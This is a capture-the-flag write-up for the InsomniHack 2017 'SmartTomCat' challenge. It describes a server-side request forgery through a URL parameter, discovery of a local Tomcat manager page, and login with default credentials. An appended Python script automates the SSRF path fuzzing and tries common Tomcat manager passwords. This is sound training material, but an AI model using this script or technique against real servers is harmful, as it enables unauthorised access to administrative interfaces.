g0ku704/insomnihack-teaser-2017-smarttomcat
InsomniHack Teaser 2017 SmartTomCat WriteUp

The challenge description was as follows:

Normal, regular cats are so 2000 and late, I decided to buy this allegedly smart tomcat robot Now the damn thing has attacked me and flew away. I can't even seem to track it down on the broken search interface... Can you help me ?
Search interface


First, in the page source, the latitude (X) and longitude (Y) parameters are posted as follows. Note that the two values are not sent on their own: the client builds a complete URL pointing at `http://localhost:8080/index.jsp` and posts that whole URL in a single parameter, `u`:

```javascript
...
    // The coordinates are wrapped in a full URL to a local Tomcat instance;
    // that URL, not the coordinates, is what /index.php receives.
    var cat_coords = 'http://localhost:8080/index.jsp?x=' + parseFloat($('#xcoord').val()) + '&y=' + parseFloat($('#ycoord').val());
    var $form = $(this);
    var $inputs = $form.find('input, select, button, textarea');
    $inputs.prop('disabled', true);

    request = $.ajax({
        url: '/index.php',
        type: 'post',
        success: function(data) {
          markers.clearMarkers();
          while(map.popups.length) {map.removePopup(map.popups[0]);}
          var y = parseFloat($('#ycoord').val());
          var x = parseFloat($('#xcoord').val());
          if (isNaN(y) || isNaN(x)) {y = 15.2833; x = -4.2667;}
          lonlat = new OpenLayers.LonLat(y,x).transform(new OpenLayers.Projection("EPSG:4326"),map.getProjectionObject());
          center_marker = new OpenLayers.Marker(lonlat);
          markers.addMarker(center_marker);
          // Whatever body /index.php returns is rendered verbatim in the popup,
          // so the response of the fetched URL is visible to the client.
          popup = new OpenLayers.Popup.FramedCloud("popup",
                   lonlat,
                   null,
                   data, null,
                   true);
          map.addPopup(popup);
          map.setCenter(lonlat,zoom);
        },
        data: {
            u: cat_coords
        }
...
```

Next, I sent the request to Repeater and got the following response.

Since the `u` parameter is a full URL, the X and Y parameters reach the backend as a GET request to a local server on port 8080; in other words, the server fetches whatever URL it is given and returns the result (a server-side request forgery). When I sent the request without the parameters I got the following response.

I could only send requests to the local server when X and Y were included. Then I looked for web content on the local server and found something interesting.

Whoa! The smart 'tomcat' is actually an Apache Tomcat server (the Apache Tomcat logo also appears on the index page). I wrote a small Python and Bash fuzzing script to discover web content on the Apache Tomcat server using Tomcat dorks, and found that the '/manager/html' directory exists but requires authentication.

For the HTTP Basic authentication, I tried some of the default user:pass combinations used for the Apache Tomcat manager page and voilà, the flag was given in the response.

Flag: INS{th1s_is_re4l_w0rld_pent3st}
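The whole chain above (SSRF through `u`, Tomcat path discovery, then default credentials against `/manager/html`) as one script. This is an added example, not the author's own fuzzing script. What it takes from the page: the form POSTs one field `u` to `/index.php`, the backend fetches that URL and returns the body, and the fetched URL must carry `x` and `y`. Everything else is an assumption: the target URL is a placeholder, the path wordlist is just Tomcat's default web applications, the credential list is a handful of commonly tried pairs, Basic-auth credentials are passed in the userinfo part of the URL (the write-up does not say how its author did it), the strings used to classify responses are the text of Tomcat's default error pages, and `stub_fetch` is a constructed stand-in for the real endpoint so the logic can be run offline.

```python
"""SSRF-driven probing of the Tomcat instance behind the SmartTomCat search form.

Added example, not the write-up author's script. Target host, wordlist,
credential list, userinfo-based Basic auth and the response markers are all
assumptions; the `u` parameter, /index.php and the mandatory x/y come from
the page source.
"""
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Optional, Tuple

TARGET = "http://challenge.example/index.php"  # placeholder for the challenge host
INNER_HOST = "localhost:8080"                   # from the page source

# Tomcat's default web applications (assumed wordlist, not the author's).
TOMCAT_PATHS = ["/manager/html", "/manager/status", "/host-manager/html",
                "/docs/", "/examples/"]

# Commonly tried manager credentials. Tomcat ships with no manager user
# enabled, so any pair that works was added to tomcat-users.xml on purpose.
DEFAULT_CREDS = [("tomcat", "tomcat"), ("admin", "admin"),
                 ("tomcat", "s3cret"), ("admin", "tomcat")]

FLAG_RE = re.compile(r"INS\{[^}]*\}")


def build_inner_url(path: str, x: str = "1", y: str = "1",
                    creds: Optional[Tuple[str, str]] = None) -> str:
    """URL the backend will fetch. x and y are always appended because the
    backend refuses requests without them. Credentials go into the userinfo
    part of the URL; that the fetcher honours them there is an assumption."""
    netloc = INNER_HOST
    if creds is not None:
        user, pw = (urllib.parse.quote(c, safe="") for c in creds)
        netloc = f"{user}:{pw}@{netloc}"
    return f"http://{netloc}{path}?{urllib.parse.urlencode({'x': x, 'y': y})}"


def build_form_body(inner_url: str) -> bytes:
    """Form body exactly as the page's JavaScript sends it: one field, u."""
    return urllib.parse.urlencode({"u": inner_url}).encode()


def fetch_via_ssrf(inner_url: str, target: str = TARGET) -> str:
    """POST the inner URL to the search endpoint; return the proxied body."""
    req = urllib.request.Request(target, data=build_form_body(inner_url),
                                 method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def classify(body: str) -> str:
    """Coarse classification of the body Tomcat returned through the proxy,
    keyed on the wording of Tomcat's default error pages (assumed)."""
    if "HTTP Status 404" in body:
        return "missing"
    if "HTTP Status 401" in body or "requires HTTP authentication" in body:
        return "auth"
    return "found"


def fuzz_paths(paths: Iterable[str],
               fetch: Callable[[str], str]) -> Dict[str, str]:
    """Map each path to missing/auth/found. `fetch` is injected so the same
    logic runs against the stub below or the real endpoint."""
    return {p: classify(fetch(build_inner_url(p))) for p in paths}


def brute_basic_auth(path: str, creds: Iterable[Tuple[str, str]],
                     fetch: Callable[[str], str]
                     ) -> Tuple[Optional[Tuple[str, str]], Optional[str]]:
    """Try each credential pair against a protected path. Returns the first
    pair that gets past the 401 and the flag found in that body, if any."""
    for user, pw in creds:
        body = fetch(build_inner_url(path, creds=(user, pw)))
        if classify(body) == "auth":
            continue
        match = FLAG_RE.search(body)
        return (user, pw), (match.group(0) if match else None)
    return None, None


def stub_fetch(url: str) -> str:
    """Constructed stand-in for the SSRF endpoint (sample data, offline)."""
    if "/manager/html" in url:
        if "tomcat:s3cret@" in url:
            return "<html><body>Tomcat Web Application Manager INS{stub_flag}</body></html>"
        return "HTTP Status 401 - Unauthorized. This request requires HTTP authentication."
    if "/docs/" in url:
        return "<html>Apache Tomcat documentation</html>"
    return "HTTP Status 404 - Not Found"


if __name__ == "__main__":
    found = fuzz_paths(TOMCAT_PATHS, fetch_via_ssrf)  # swap in stub_fetch to dry-run
    for path, state in found.items():
        print(f"{state:8} {path}")
    for path in (p for p, s in found.items() if s == "auth"):
        print(path, brute_basic_auth(path, DEFAULT_CREDS, fetch_via_ssrf))
```

The fetch function is injected rather than hard-wired so the discovery and credential logic can be checked against `stub_fetch` before pointing it at a live target; the stub's flag and credential pair are made up for that purpose only.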
